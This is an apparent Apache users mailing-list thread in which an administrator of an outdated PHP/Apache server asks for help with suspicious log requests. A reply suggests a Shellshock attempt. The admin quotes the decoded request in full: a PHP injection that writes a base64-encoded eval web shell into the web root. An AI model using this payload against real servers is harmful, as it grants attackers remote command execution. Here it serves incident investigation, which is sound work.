----- On Feb 6, 2017, at 5:45 PM, Daniel dferradal@xxxxxxxxx wrote:
> Actually now that I re-read the requests it also looks as shellshock succesful
> attempt.
> Operative system software not updated recently either?
> 2017-02-06 17:42 GMT+01:00 Daniel < dferradal@xxxxxxxxx > :
>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.
>> Do you use a very old php version as well?
Everything is old. php, OS, apache. This is to my account. It's a system i nearly oversaw, because we use it very rarely.
But nevertheless, it should be updated. I know. And i learn.
>>> What i find out already:
>>> https://url-encoder.de/ helped me to decode the URL:
>>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>>> '->|';file_put_contents($_SERVER['DOCUME
>>> NT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>>> '|<-';
>>> Currently i don't understand what this means.
>>> I don't find a file webconfig.txt.php on my system.
>>> Currently no weird process, no new user in /etc/passwd, no packtes to the
>>> network which includes this ip.
>>> Thankful for any tip.
Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671
---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx
|